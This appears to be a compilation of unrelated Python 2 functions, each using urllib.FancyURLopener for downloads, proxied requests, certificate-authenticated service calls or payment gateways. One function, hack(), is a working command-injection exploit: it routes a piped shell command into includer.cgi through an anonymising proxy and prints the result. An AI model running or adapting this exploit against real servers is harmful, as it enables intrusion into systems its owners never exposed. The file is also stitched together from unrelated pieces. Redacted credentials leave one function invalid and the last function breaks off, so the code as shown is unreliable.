def request(self, host, handler, request_body, verbose=0):
    """Issue an XML-RPC HTTP request, honouring an optional HTTP proxy.

    When self.proxyurl is set the request is routed through that proxy;
    credentials embedded in the proxy URL (user:pass@host) are sent as a
    Basic Proxy-authorization header.  When self.mysessid is set, the
    server session cookie is re-attached so the call stays in-session.
    Returns the parsed XML-RPC response via self.parse_response().
    """
    if not self.proxyurl is None:
        # Split "scheme://user:pass@host:port/..." into scheme and rest.
        type, r_type = splittype(self.proxyurl)
        phost, XXX = splithost(r_type)  # path part is unused
        puser_pass = None
        if '@' in phost:
            # Proxy URL carries credentials: extract and Basic-encode them.
            user_pass, phost = phost.split('@', 1)
            if ':' in user_pass:
                user, password = user_pass.split(':', 1)
                puser_pass = base64.encodestring(
                    '%s:%s' % (unquote(user), unquote(password))).strip()
        # Opener configured to send http traffic through the proxy host.
        urlopener = urllib.FancyURLopener({'http': 'http://%s' % phost})
        if not puser_pass:
            urlopener.addheaders = [('User-agent', self.user_agent)]
        else:
            urlopener.addheaders = [('User-agent', self.user_agent),
                                    ('Proxy-authorization',
                                     'Basic ' + puser_pass)]
    else:
        # No proxy configured: plain opener.
        urlopener = urllib.FancyURLopener()
    if not self.mysessid is None:
        # Attach the session cookie expected by the server.
        urlopener.addheaders.append(
            ("Cookie", "%s=%s" % (self.session_name, self.mysessid)))
    host = unquote(host)
    f = urlopener.open("http://%s%s" % (host, handler), request_body)
    self.verbose = verbose
    return self.parse_response(f)
def fetchBinary(url): fn = '' try: fn = os.path.join(DIR_USERDATA, os.path.basename(url)) fn = xbmc.translatePath(fn) fn = xbmc.makeLegalFilename(fn) log('fetchBinary() url=%s fn=%s' % (url, fn)) if not os.path.isfile(fn): opener = urllib.FancyURLopener() fn, resp = opener.retrieve(url, fn) opener.close() os.path.isfile(fn) except: msg = sys.exc_info()[1] print msg url = 'http://xbmc.svn.sourceforge.net/svnroot/xbmc/trunk/XBMC/skin/Project%20Mayhem%20III/media/defaultVideoBig.png' fn = os.path.join(DIR_USERDATA, 'defaultVideoBig.png') fn = xbmc.translatePath(fn) log('fetchBinary() url=%s fn=%s' % (url, fn)) if not os.path.isfile(fn): opener = urllib.FancyURLopener() fn, resp = opener.retrieve(url, fn) opener.close() os.path.isfile(fn) if fn and os.path.isfile(fn): return fn else: return ''
def __init__(self, code, cardUID, size): self.score = 0 #Need to get the iris template from the DB. #Initiates the opener to send the HTTP request. opener = urllib.FancyURLopener({}) #Send the request. #request = opener.open("http://192.168.0.19:44556/Service1.svc/getIrisHash/" + cardUID) request = opener.open( "http://192.168.43.114:44556/Service1.svc/getIrisHash/" + cardUID) response = request.read() #If the response is not empty. if response != "{\"getIrisHashResult\":\"\"}": answer = response[22:-2] #Run through the characters. for i in range(0, len(answer)): #Check if it's a match. if code[i] == answer[i]: self.score += 1 #If the score is above 80% if self.score >= (0.8 * size): #Then it's a match. self.outcome = "Match" #Attendance must then be recorded. #Initiates the opener to send the HTTP request. opener = urllib.FancyURLopener({}) #Send the request. #request = opener.open("http://192.168.0.19:44556/Service1.svc/takeAttendance/" + cardUID) request = opener.open( "http://192.168.43.114:44556/Service1.svc/takeAttendance/" + cardUID) response = request.read() #If the response is not empty. if response != "{\"takeAttendanceResult\":\"\"}": answer = response[24:-1] if answer == '0': #TODO Show rgb green print 'Student has attended.' self.outcome = 'Student has attended.' else: #TODO Show rgb red print 'Student has already attended.' self.outcome = 'Student has already attended.' else: #Then it's not a match #TODO rgb color must be red self.outcome = "No match"
def level20():
    """Python Challenge level 20: probe byte ranges of unreal.jpg.

    Issues a series of HTTP Range requests against the (credential-
    redacted) challenge URL, then saves the final 41-byte range as a
    local zip file.
    """
    import urllib
    # NOTE(review): the '*****' user:password in this URL was redacted
    # by whatever published this source; restore real credentials to run.
    url = 'http://*****:*****@www.pythonchallenge.com/pc/hex/unreal.jpg'
    # Walk the sequence of byte ranges the puzzle reveals step by step.
    for i in [(30237,30337), (30284,30384), (30295,30395), (30313,30413),\
            (2123456744,2123456788), (2123456712,2123456743)]:
        opener = urllib.FancyURLopener({})
        opener.addheader('range', 'bytes=%d-%d' % i)
        f = opener.open(url)
    # The last range holds a zip archive; save it for the next level.
    opener = urllib.FancyURLopener({})
    opener.addheader('range', 'bytes=1152983631-1152983671')
    f = opener.open(url)
    open('data/level_20.zip', 'wb').write(f.read())
def Download_Benchmark_Algorithms(Benchmark):
    """Download one of the supported ExPRESS benchmark DFGs as a .dot
    file and point Config.TG_DOT_Path / Config.TG_Type at it.

    Supported keys: 'idct', 'fdct', 'mi'.  Returns True on success (or
    when the file is already on disk), False for an unsupported
    benchmark or an unavailable download.
    """
    testfile = urllib.FancyURLopener()
    if Benchmark == 'idct':
        # Inverse Discrete Cosine Transform
        url = "http://express.ece.ucsb.edu/benchmark/jpeg/jpeg_idct_ifast_dfg__6.dot"
        DestinationFile = 'Benchmarks/idct.dot'
    elif Benchmark == 'fdct':
        # Forward Discrete Cosine Transform
        url = "http://express.ece.ucsb.edu/benchmark/jpeg/jpeg_fdct_islow_dfg__6.dot"
        DestinationFile = 'Benchmarks/fdct.dot'
    elif Benchmark == 'mi':
        # Matrix Inverse
        url = "http://express.ece.ucsb.edu/benchmark/mesa/invert_matrix_general_dfg__3.dot"
        DestinationFile = 'Benchmarks/mi.dot'
    else:
        print "THIS BENCHMARK IS NOT SUPPORTED..."
        return False
    if not os.path.isfile(DestinationFile):
        # NOTE(review): in Python 2, urllib.urlopen()'s .code can be
        # None on a successful fetch, which would make "code / 100"
        # raise TypeError here -- confirm and consider getcode() with a
        # None guard.
        code = urllib.urlopen(url).code
        if code / 100 >= 4:
            print "BENCHMARK IS NOT AVAILABLE..."
            return False
        else:
            print "DOWNLOADING BENCHMARK..."
            testfile.retrieve(url, DestinationFile)
            print "FINISHED DOWNLOADING..."
            Config.TG_DOT_Path = DestinationFile
            Config.TG_Type = 'FromDOTFile'
            return True
    else:
        print "FILE ALREADY EXISTS..."
        Config.TG_DOT_Path = DestinationFile
        Config.TG_Type = 'FromDOTFile'
        return True
def hack():
    """Send the includer.cgi command-injection payload through a proxy.

    Prompts for an HTTP proxy, requests *host*/includer.cgi with the
    module-level *send* payload piped into it, dumps the raw response to
    temp.txt, then echoes the response with JavaScript document.write()
    wrappers, HTML tags and comment markers stripped.
    """
    print "[X] Connecting..."
    proxer = raw_input("Type your proxy (IP:PORT) here: ")
    # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list)
    proxy = {'http': 'http://' + proxer}
    print "[X] Proxing...",
    url = urllib.FancyURLopener(proxy)
    print "[OK]"
    print "[X] Sending exploit...",
    stack = url.open(host + "includer.cgi?=|" + send + "|")
    read = stack.read()
    print "[OK]"
    print "[X] Exploited !\n"
    # NOTE(review): the write handle is rebound to a read handle without
    # being closed/flushed first; linecache may observe an incomplete
    # temp.txt on platforms with buffered writes -- confirm.
    t_file = open('temp.txt', 'w')
    print >> t_file, read
    t_file = open('temp.txt', 'r')
    for line in linecache.getlines("temp.txt"):
        # Unwrap document.write('...') / document.writeln('...') lines,
        # skip HTML tags and C-style comment delimiters, echo the rest.
        if(line[0:16]=="document.write('"):
            print line[16:-4]
        elif(line[0:18]=="document.writeln('"):
            print line[18:-4]
        elif(line[0]=="<"):
            pass
        elif(line[0:2]=="*/"):
            pass
        elif(line[0:2]=="/*"):
            pass
        else:
            print line[:-1]
def search_A(request, type_of_record, page):
    """Query the local search API and return the raw response body.

    Builds the query string from the search term, record class and page
    number, fetches it from the host's port-8000 API, and hands back the
    bytes exactly as received.
    """
    query_url = ("http://" + myhost + ":8000/api/search?name=" + request
                 + "&class=" + type_of_record + "&page=" + page)
    opener = urllib.FancyURLopener(None)
    sock = opener.open(query_url)
    payload = sock.read()
    sock.close()
    return payload
def checkStatus(self):
    """Poll the Opal app service for the status of self.JobID.

    When the job reports DONE (code 8) the result URL is displayed and
    made clickable, the output-file list is filtered down to the .dlg
    files, and their download starts through a GAMA-certificate-
    authenticated opener.  Otherwise the status labels are refreshed and
    another poll is scheduled in 5 seconds.
    """
    resp = self.appServicePort.queryStatus(queryStatusRequest(self.JobID))
    if resp._code == 8:  # 8 = GramJob.STATUS_DONE
        descr = self.cmdForms['default'].descr
        descr.entryByName['status0']['widget'].configure(text=resp._message)
        webbrowser.open(resp._baseURL)
        descr.entryByName['status1']['widget'].configure(text=resp._baseURL,
                                                         fg='Blue', cursor='hand1')

        def openurl(event):
            # Click handler: re-open the job's base URL in the browser.
            webbrowser.open(resp._baseURL)
        descr.entryByName['status1']['widget'].bind(sequence="<Button-1>",
                                                    func=openurl)
        self.resp = self.appServicePort.getOutputs(getOutputsRequest(self.JobID))
        descr.entryByName['WS_ProgressBar']['widget'].grid(sticky='ew',
                                                           row=2, column=0)
        # Client-certificate auth using the GAMA proxy credentials.
        self.opener = urllib.FancyURLopener(cert_file=self.proxy_gama,
                                            key_file=self.proxy_gama)
        self.download_finished = False
        self.new_download = True
        self.file_counter = -1
        # Keep only '*dlg' outputs: remove every non-dlg file in place.
        inputs = [x for x in self.resp._outputFile if x._name[-3:] != 'dlg']
        if len(inputs) != len(self.resp._outputFile):
            for input in inputs:
                self.resp._outputFile.remove(input)
        self.download()
        return
    else:
        self.cmdForms['default'].descr.entryByName['status0']['widget'].\
            configure(text="Status: " + resp._message)
        self.cmdForms['default'].descr.entryByName['status1']['widget'].\
            configure(text="")
        # Not done yet: poll again in 5 seconds.
        self.vf.GUI.ROOT.after(5000, self.checkStatus)
def AddXbox360GamesIfMissing():
    """Sync the Xbox 360 game list from the gamezapp web service into
    the local Gamez.db, inserting any titles not already present.

    Fetches the JSON list, clears the existing Xbox360 entries via
    ClearGames(), then inserts each missing game.  Returns None; logs
    and bails out if the web service is unreachable.
    """
    url = "http://www.gamezapp.org/webservice/xbox360"
    response = ''
    try:
        responseObject = urllib.FancyURLopener({}).open(url)
        response = responseObject.read()
        responseObject.close()
    except Exception:
        # Narrowed from a bare "except:" so Ctrl-C/SystemExit propagate.
        LogEvent("Unable to connect to web service: " + url)
        return
    json_data = json.loads(response)
    ClearGames("Xbox360")
    db_path = os.path.join(os.path.abspath(""), "Gamez.db")
    # One connection for the whole sync (the original opened a fresh,
    # never-closed connection per game) and parameterized SQL instead of
    # string concatenation, which was open to SQL injection via titles.
    connection = sqlite3.connect(db_path)
    try:
        for data in json_data:
            game_name = data['GameTitle']
            game_type = data['GameType']
            game_cover = data['GameCover']
            cursor = connection.cursor()
            cursor.execute(
                "SELECT count(ID) from games where game_name = ? AND system='Xbox360'",
                (game_name,))
            recordCount = cursor.fetchall()[0][0]
            cursor.close()
            if str(recordCount) == "0":
                LogEvent("Adding XBOX 360 Game [" + game_name.replace("'", "''") + "] to Game List")
                cursor = connection.cursor()
                cursor.execute(
                    "INSERT INTO games (game_name,game_type,system,cover) values(?,?,'Xbox360',?)",
                    (game_name, game_type, game_cover))
                connection.commit()
                cursor.close()
    finally:
        connection.close()
    return
def install(runas, uuid):
    """Download and unpack GNOME Shell extension *uuid* for user *runas*.

    Fetches the extension zip from the extensions site, replaces any
    existing extension directory, unzips into place, and chowns the
    result to runas and their primary group.  The temporary download is
    always deleted.
    """
    # NOTE(review): shell_version is computed but never used here.
    shell_version = _shell_major_version()
    target = _extension_dir(runas, uuid)
    info = _extension_info(uuid)
    url = EXTENSION_BASE_URL + info['download_url']
    log.debug('Downloading extension from {0}'.format(url))
    group = _primary_group(runas)
    log.debug('Primary group for {0} is {1}'.format(runas, group['name']))
    client = urllib.FancyURLopener()
    # retrieve() with no destination downloads to a temp file.
    filename, response = client.retrieve(url)
    log.debug('Extracting extension from {0} to {1}'.format(filename, target))
    try:
        if os.path.exists(target):
            log.debug('Removing existing extension dir {0}'.format(target))
            shutil.rmtree(target)
        __salt__['archive.unzip'](filename, target)
        # Run as root so ownership can be handed to the target user.
        __salt__['cmd.run']([
            'chown', '-R',
            '{0}:{1}'.format(runas, group['name']),
            target,
        ], runas='root')
    finally:
        # Always clean up the temp file retrieve() created.
        os.unlink(filename)
def download(url, destPath, addName=True, clear=False):
    """Download *url* to *destPath*, following one redirect, with a
    progress bar.

    addName -- append the redirected URL's basename to destPath
    clear   -- re-download even if the destination file already exists

    Uses the module-level *pbar* global for progress reporting (updated
    by the downloadProgress reporthook).  Returns None on IOError;
    otherwise falls through after finishing (no explicit return value
    for the success path).
    """
    global pbar
    # Resolve redirects first so the saved filename matches the target.
    redirectedUrl = urllib.urlopen(url).geturl()
    if redirectedUrl != url:
        print >> sys.stderr, "Redirected to", redirectedUrl
    destFileName = destPath
    if addName:
        destFileName = destPath + "/" + os.path.basename(redirectedUrl)
    if not os.path.exists(os.path.dirname(destFileName)):
        os.makedirs(os.path.dirname(destFileName))
    if clear or not os.path.exists(destFileName):
        if os.path.exists(destFileName):
            # clear existing file
            os.remove(destFileName)
        print >> sys.stderr, "Downloading file", redirectedUrl, "to", destFileName
        widgets = [
            FileTransferSpeed(), ' <<<', Bar(), '>>> ',
            Percentage(), ' ', ETA()
        ]
        pbar = ProgressBar(widgets=widgets, maxval=100)
        pbar.start()
        try:
            urllib.FancyURLopener().retrieve(redirectedUrl, destFileName,
                                             reporthook=downloadProgress)
        except IOError, e:
            print >> sys.stderr, e.errno
            print >> sys.stderr, "Error downloading file", redirectedUrl
            pbar.finish()
            pbar = None
            return None
        pbar.finish()
        pbar = None
def getSoup(url, proxylist=proxylist):
    """Fetch *url* through a proxy and return it parsed as BeautifulSoup.

    Bug fix: the original looped over *proxylist* but returned inside
    the first iteration, so every proxy after the first was dead code.
    Each proxy is now tried in order; the next one is attempted when a
    fetch fails, and the last error is re-raised when all of them fail.
    Returns None when *proxylist* is empty (as before).
    """
    last_error = None
    for candidate in proxylist:
        opener = urllib.FancyURLopener({'': candidate})
        try:
            html = opener.open(url).read()
        except IOError as err:
            last_error = err
            continue
        return BeautifulSoup(html)
    if last_error is not None:
        raise last_error
def download_media(media_type, url):
    """Save the file at *url* under ./temp_vids/ and return its path.

    Returns None when *media_type* is falsy (nothing to download); the
    local filename is taken from the last path segment of the URL.
    """
    if not media_type:
        return None
    fetcher = urllib.FancyURLopener()
    local_path = './temp_vids/' + url.split('/')[-1]
    fetcher.retrieve(url, local_path)
    return local_path
def download(link, filename=None):
    """Download a file from a link.

    If *filename* is supplied the contents are written to that file and
    the filename is returned as a check.  If *filename* is None, the
    contents go to a temporary file and both the temp filename B{and}
    the still-open opener are returned -- remember to close the opener
    after finishing reading!

    @parameter link: the url of the file
    @type link: string
    @parameter filename: the name of the file to write to (optional)
    @type filename: str
    @return: output filename(, url object)
    @rtype: string(, FancyURLopener)
    """
    url = urllib.FancyURLopener()
    myfile, msg = url.retrieve(link, filename=filename)
    if filename is not None:
        # Caller named a destination: download is complete, close now.
        url.close()
        return myfile
    else:
        # Temp-file mode: hand the opener back for the caller to close.
        return myfile, url
def get_html(url=''):
    """Fetch *url* and return its body as a string, '' on any error.

    Honours the module-level proxy settings (proxy_use, proxy_ip,
    proxy_port) and always sends a desktop-Chrome User-agent header.
    """
    if proxy_use == 1:
        # Route through the configured HTTP proxy.
        opener = urllib.FancyURLopener(
            {'http': 'http://' + proxy_ip + ':' + proxy_port + '/'})
    else:
        opener = urllib.FancyURLopener({})
    opener.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36'
    )]
    try:
        f = opener.open(url)
        return f.read()
    except Exception, e:
        # Best-effort fetch: report and fall back to an empty page.
        print e
        return ''
def get_dropbox_links_in_webpage(url):
    """Scrape *url* for Dropbox share links and return DropboxLink objects.

    Fetches the page, extracts (token, file id, path) triples with the
    module-level REGEX, de-duplicates them, and builds view/download/
    direct-download URLs from the module's URL templates.
    """
    print "about to fetch URL: ", url
    assert isinstance(url, basestring)
    opener = urllib.FancyURLopener({})
    f = opener.open(url)
    content = f.read()
    results = re.findall(REGEX, content)
    # De-duplicate the regex hits.
    results = list(set(results))
    final_results = []
    for result in results:
        shmodel_token = result[0]
        file_id = result[1]
        file_path_url_encoded = result[2]
        original_filpath = urllib.unquote(file_path_url_encoded)
        # note, we expect all non-directories to have a . in their name
        # this assumption may break things
        is_dir = '.' not in original_filpath
        view_url = DROPBOX_VIEW_URL % (shmodel_token, file_id,
                                       file_path_url_encoded)
        download_url = DROPBOX_DOWNLOAD_URL % (shmodel_token, file_id,
                                               file_path_url_encoded)
        direct_download_url = DROPBOX_DIRECT_DOWNLOAD_URL % (
            shmodel_token, file_id, file_path_url_encoded)
        final_results.append(
            DropboxLink(shmodel_token, file_id, original_filpath,
                        file_path_url_encoded, is_dir, view_url,
                        download_url, direct_download_url))
    return final_results
def get_url(self, url_data):
    """
    Process an HTTP GET request given the full URL including XML and
    throw the response into a database ASAP in case something goes
    wrong during processing.

    Uses client-certificate authentication when both cert_file and
    key_file are configured in settings.

    @param url_data The url-encoded data string
    @type url_data str
    @return dictionary of response values indexed by name
    @rtype dict
    """
    log_prefix = u'api_tools.get_url(): '
    # Let's do this before the transaction just in case it causes trouble.
    rr = raw_response()
    # If we are using certificate authentication, this is where the magic happens
    if hasattr(settings, 'cert_file') and hasattr(
            settings, 'key_file') and settings.cert_file and settings.key_file:
        cert_args = {
            'cert_file': settings.cert_file,
            'key_file': settings.key_file,
        }
    else:
        cert_args = {}
    try:
        f = urllib.FancyURLopener(**cert_args).open(
            self.settings.url, url_data)
    except IOError, ioe:
        # Network/SSL failure: surface as the API's connection error.
        _logger.error(log_prefix + (u'IOError: [%s]' % unicode(ioe)))
        raise connection_error_exception
def __init__(self, config, section):
    """Build a VOMSServer from *config* (*section* names the VO).

    Reads VO name, service URL, client cert/key and TTL from the config,
    then fetches the service WSDL over a certificate-authenticated
    opener (exiting the process if the WSDL cannot be read).
    """
    log.debug('VOMSServer.__init__(): New VOMSServer created...')
    self.section = section
    self.vo = config.get(section, 'voname')
    self.serviceurl = config.get(section, 'service_location')
    self.certfile = config.get('main', 'cert_file')
    self.keyfile = config.get('main', 'key_file')
    self.strict = config.get('main', 'strict')
    self.ttl = config.get(section, 'ttl')
    try:
        self.httpproxy = config.get('main', 'httpproxy')
    except ConfigParser.NoOptionError:
        # Proxy is optional.
        self.httpproxy = None
    # Certificate-authenticated opener for talking to the VOMS service.
    opener = urllib.FancyURLopener(cert_file=self.certfile,
                                   key_file=self.keyfile)
    # Grab WSDL from service, for fixing.
    wsdlurl = "%s?wsdl" % self.serviceurl
    log.debug("VOMSServer.__init__(): wsdl url is %s" % wsdlurl)
    try:
        r = opener.open(wsdlurl)
    except IOError, ioe:
        log.critical(
            "VOMSServer.__init__(): IOError. '%s'. Do you have read access to private key? Network connectivity? Proxy?"
            % ioe)
        sys.exit()
def AddComingSoonGames():
    """Sync the 'coming soon' game list from the gamezapp web service
    into the local Gamez.db, inserting any entries not already present.

    Fetches the JSON list, clears the existing coming-soon table via
    ClearComingSoonGames(), then inserts each missing title.  Returns
    None; logs and bails out if the web service is unreachable.
    """
    comingSoonWebServiceUrl = "http://www.gamezapp.org/webservice/comingsoon"
    response = ''
    try:
        responseObject = urllib.FancyURLopener({}).open(comingSoonWebServiceUrl)
        response = responseObject.read()
        responseObject.close()
    except Exception:
        # Narrowed from a bare "except:" so Ctrl-C/SystemExit propagate.
        LogEvent("Unable to connect to web service: " + comingSoonWebServiceUrl)
        return
    json_data = json.loads(response)
    ClearComingSoonGames()
    db_path = os.path.join(os.path.abspath(""), "Gamez.db")
    # One connection for the whole sync (the original opened a fresh,
    # never-closed connection per entry) and parameterized SQL instead
    # of string concatenation, which was open to SQL injection.
    connection = sqlite3.connect(db_path)
    try:
        for data in json_data:
            game_name = data['GameTitle']
            release_date = data['ReleaseDate']
            system = data['System']
            cursor = connection.cursor()
            cursor.execute(
                "SELECT count(ID) from comingsoon where gametitle = ? AND system = ?",
                (game_name, system))
            recordCount = cursor.fetchall()[0][0]
            cursor.close()
            if str(recordCount) == "0":
                LogEvent("Adding " + system + " Game [" + game_name.replace("'", "''") + "] to Coming Soon Game List")
                cursor = connection.cursor()
                cursor.execute(
                    "INSERT INTO comingsoon (gametitle,releasedate,system) values(?,?,?)",
                    (game_name, release_date, system))
                connection.commit()
                cursor.close()
    finally:
        connection.close()
    return
def _listReturn(self, methodname, **kwargs):
    """
    Private method used to handle calls that return a list of items.

    Appends each kwarg as a &key=value query parameter, calls the VOMS
    service method over a certificate-authenticated opener, parses the
    XML response with DOM, and returns the text of every <item> element
    as a Python list.
    """
    log.debug("VOMSServer._listReturn(%s): Begin..." % methodname)
    keys = kwargs.keys()
    params = ""
    for k in keys:
        log.debug("VOMSServer._listReturn(%s): Kwargs: key: %s val: %s" %
                  (methodname, k, kwargs[k]))
        # NOTE(review): values are not URL-encoded here -- presumably
        # the callers only pass URL-safe strings; confirm.
        params += "&%s=%s" % (k, kwargs[k])
    openurl = "%smethod=%s%s" % (self.serviceurl, methodname, params)
    log.debug("VOMSServer._listReturn(%s): opening url %s" %
              (methodname, openurl))
    opener = urllib.FancyURLopener(key_file=self.keyfile,
                                   cert_file=self.certfile)
    log.debug('VOMSServer._listReturn(%s): Contacting VOMS server...' %
              methodname)
    r = opener.open(openurl)
    s = r.read()
    log.debug("VOMSServer._listReturn(%s): XML response: \n%s" %
              (methodname, s))
    xmldoc = parseString(s)
    items = xmldoc.getElementsByTagName("item")
    anslist = []
    for i in items:
        # Each <item> holds a single text node with the value.
        d = i.childNodes[0].data
        anslist.append(d)
    return anslist
def process(self):
    """POST self.parameters to self.url (optionally through self.proxy),
    split the delimited response into self.results, and set the
    error/success/declined outcome flags.

    Raises DowCommerce.DowCommerceError for an unrecognized response
    code.
    """
    encoded_args = urllib.urlencode(self.parameters)
    if self.proxy is None:
        results = str(urllib.urlopen(
            self.url, encoded_args).read()).split(self.delimiter)
    else:
        opener = urllib.FancyURLopener(self.proxy)
        opened = opener.open(self.url, encoded_args)
        try:
            # Bug fix: this branch used "results +=" on an unbound
            # local, raising UnboundLocalError whenever a proxy was
            # configured.
            results = str(opened.read()).split(self.delimiter)
        finally:
            opened.close()
    # Response is a delimited list of key=value pairs.
    for result in results:
        (key, val) = result.split('=')
        self.results[key] = val
    if self.results['response'] == '1':
        self.error = False
        self.success = True
        self.declined = False
    elif self.results['response'] == '2':
        self.error = False
        self.success = False
        self.declined = True
    elif self.results['response'] == '3':
        self.error = True
        self.success = False
        self.declined = False
    else:
        # Unknown response code: flag as error and raise.
        self.error = True
        self.success = False
        self.declined = False
        raise DowCommerce.DowCommerceError(self.results)
def listMembersSAX(self, group=None):
    """
    Returns (Python) list of DNs members of <group>, or all members of
    the VO if group argument is omitted.  Group must be given as path,
    e.g. /voname/group1

    This method doesn't use a generic template because it uses SAX
    rather than DOM, for performance reasons.
    """
    log.debug("VOMSServer.listMembers(): Begin...")
    if not group:
        # Default to the whole VO.
        group = "/%s" % self.vo
    openurl = "%smethod=listMembers&groupname=%s" % (self.serviceurl, group)
    log.debug("VOMSServer.listMembers: opening url %s" % openurl)
    # Certificate-authenticated opener for the VOMS service.
    opener = urllib.FancyURLopener(key_file=self.keyfile,
                                   cert_file=self.certfile)
    log.debug('VOMSServer.listMembers: Contacting VOMS server...')
    r = opener.open(openurl)
    s = r.read()
    log.debug('VOMSServer.listMembers: XML response: \n%s' % s)
    vmp = VOMSMembersParser()
    log.debug('VOMSServer.listMembers: Parsing VOMS server response...')
    vmp.parse(s)
    members = vmp.get_members()
    return members
def SendNotification(self, message, username, password):
    """Send *message* to the riveu.com notification API via HTTP GET.

    The response body is read and discarded; no value is returned.
    """
    # NOTE(review): the '******' runs below are credential fragments
    # redacted by whatever published this source -- as committed this
    # line is not valid Python and must be restored (presumably with
    # urllib.quote_plus(username/password)) before use.
    data = "CMD=SEND_NOTIFICATION&Username="******"&Password="******"&Message=" + urllib.quote_plus(
        message)
    url = 'http://riveu.com/API.aspx?' + data
    responseObject = urllib.FancyURLopener({}).open(url)
    responseObject.read()
    responseObject.close()
def download_version(version): """ Downloads and saves the kmotion version 'version' saving it in '/tmp/kmotion_update/upgrade.tar.gz' args : version ... the version string excepts : return : """ # download version url = 'http://kmotion-v2-code.googlecode.com/files/kmotion_' + version.replace( ' ', '_') + '.tar.gz' opener = urllib.FancyURLopener() try: f_obj = opener.open(url) gzip_file = f_obj.read() f_obj.close() except IOError: raise exit_('Can\'t download latest version from \'%s\' IOError' % url) # and save it checking('Saving version %s' % version) ok() try: os.mkdir('/tmp/kmotion_upgrade') f_obj = open('/tmp/kmotion_upgrade/upgrade.tar.gz', 'w') f_obj.write(gzip_file) f_obj.close() except IOError: raise exit_( 'Can\'t save latest version as /tmp/kmotion_upgrade/upgrade.tar.gz' )
def test_urllib():
    """Demo of the Python 2 urllib API: GET, GET-with-params, POST,
    opener with/without proxy, and urlretrieve (examples adapted from
    the official documentation)."""
    # Plain GET request
    f = urllib.urlopen('http://www.baidu.com')
    print f.read()
    # GET with urlencoded parameters (official docs example)
    params = urllib.urlencode({'spam': 1, 'eggs': 2, 'bacon': 0})  # parameter dict
    print '*' * 200
    print params
    # GET
    f = urllib.urlopen('http://www.musi-cal.com/cgi-bin/query?%s' % params)
    print f.read()
    # POST request (official docs example)
    f = urllib.urlopen('http://www.musi-cal.com/cgi-bin/query', params)
    print '*' * 200
    print f.read()
    # Using a proxy (official docs example); apparently doesn't work
    # proxies = {'http': 'http://proxy.example.com:8080/'}
    # opener = urllib.FancyURLopener(proxies)
    # f = opener.open('http://www.python.org')
    # print '*' * 200
    # print f.read()
    # Without a proxy (official docs example)
    opener = urllib.FancyURLopener({})
    f = opener.open('http://www.python.org/')
    print '*' * 200
    print f.read()
    # Download to a local temp file
    f = urllib.urlretrieve('http://www.baidu.com')
    print '*' * 200
    print f
def process(self):
    """POST self.parameters to the Authorize.Net gateway (test or live
    URL depending on self.testmode), append the delimited response
    fields to self.results, and map the first 40 fields onto the named
    Results tuple in self.response.

    Sets the error/success/declined flags from the textual result;
    raises AIM.AIMError for any response that is neither Approved nor
    Declined.  Assumes self.results was initialized to a list elsewhere
    (this method appends with +=).
    """
    encoded_args = urllib.urlencode(self.parameters)
    if self.testmode == True:
        url = 'https://test.authorize.net/gateway/transact.dll'
    else:
        url = 'https://secure.authorize.net/gateway/transact.dll'
    if self.proxy == None:
        self.results += str(urllib.urlopen(
            url, encoded_args).read()).split(self.delimiter)
    else:
        opener = urllib.FancyURLopener(self.proxy)
        opened = opener.open(url, encoded_args)
        try:
            self.results += str(opened.read()).split(self.delimiter)
        finally:
            opened.close()
    # Named view over the first 40 positional response fields.
    Results = namedtuple('Results', 'ResultResponse ResponseSubcode ResponseCode ResponseText AuthCode \
        AVSResponse TransactionID InvoiceNumber Description Amount PaymentMethod \
        TransactionType CustomerID CHFirstName CHLastName Company BillingAddress \
        BillingCity BillingState BillingZip BillingCountry Phone Fax Email ShippingFirstName \
        ShippingLastName ShippingCompany ShippingAddress ShippingCity ShippingState \
        ShippingZip ShippingCountry TaxAmount DutyAmount FreightAmount TaxExemptFlag \
        PONumber MD5Hash CVVResponse CAVVResponse')
    self.response = Results(*tuple(r for r in self.results)[0:40])
    if self.getResultResponseFull() == 'Approved':
        self.error = False
        self.success = True
        self.declined = False
    elif self.getResultResponseFull() == 'Declined':
        self.error = False
        self.success = False
        self.declined = True
    else:
        raise AIM.AIMError(self.response.ResponseText)
def worker():
    """Chunk-download worker: pulls (index, offset, nbytes) tasks from
    the shared *tasks* queue, fetches each byte range of *url* with up
    to 5 retries, and puts (index, data) results on *chunks*.

    Stops when the queue is drained or *abort_event* is set; sets
    *abort_event* itself when a chunk cannot be fetched so sibling
    workers also stop.
    """
    while not abort_event.isSet():
        try:
            (index, offset, nbytes) = tasks.get(block=False)
            for retry in range(5):
                try:
                    request = urllib.FancyURLopener()
                    if offset > 0:
                        # Resume mid-file via an HTTP Range request.
                        request.addheader("Range", "bytes=%s-" % offset)
                    page = request.open(url)
                    data = page.read(nbytes)
                    page.close()
                    chunks.put((index, data))
                    if ratelimit:
                        ratelimit.checkpoint(nbytes)
                    break  # Chunk successfully fetched.
                except Exception:
                    _log.exception("Exception in download worker")
            else:
                # All 5 retries failed for this chunk.
                raise RuntimeError("Failed to download %s:%s from %s" %
                                   (offset, nbytes, url))
        except Queue.Empty:
            # No more tasks: this worker is done.
            break
        except Exception:
            # Unrecoverable failure: tell every worker to stop.
            _log.exception("Exception in download worker")
            abort_event.set()
            break
def getUrlAndFilenameByTid(browser, tid):
    """Resolve the download URL, filename and size for recording *tid*.

    First asks the service whether an advertise-free version is
    available (status '1'); if not, returns (None, None, None).
    Otherwise requests the download URL, then probes it once to read
    filename and size from the response headers.

    Returns the tuple (url, filename, filesize).
    """
    logging.debug("requesting url, filename and filesize of TID %s" % tid)
    # Step 1: ask whether the ad-free version is ready yet.
    url = (
        '/STV/M/obj/cRecordOrder/croGetAdFreeAvailable.cfm?null.GetAdFreeAvailable&=&ajax=true&c0-id='
        '' + getIdent() + '&c0-methodName=GetAdFreeAvailable&c0-param0=number%3A'
        '' + tid + '&c0-scriptName=null&callCount=1&clientAuthenticationKey=&xml=true')
    response = browser.open(url)
    status = re.search("_\d+_\d+ = '(\d)';", response.get_data()).group(1)
    if not int(status) == 1:
        logging.debug(
            "skipping TID %s, no advertise-free version available at the moment"
            % tid)
        return (None, None, None)
    # Step 2: fetch the actual download URL.
    url = (
        '/STV/M/obj/cRecordOrder/croGetDownloadUrl.cfm?null.GetDownloadUrl&ajax=true&c0-id='
        '' + getIdent() + '&c0-methodName=GetDownloadUrl&c0-param0=number%3A'
        '' + tid + '&c0-param1=number%3A0&c0-param2=boolean%3Atrue&c0-scriptName=null&callCount=1&clientAuthenticationKey=&xml=true'
    )
    response = browser.open(url)
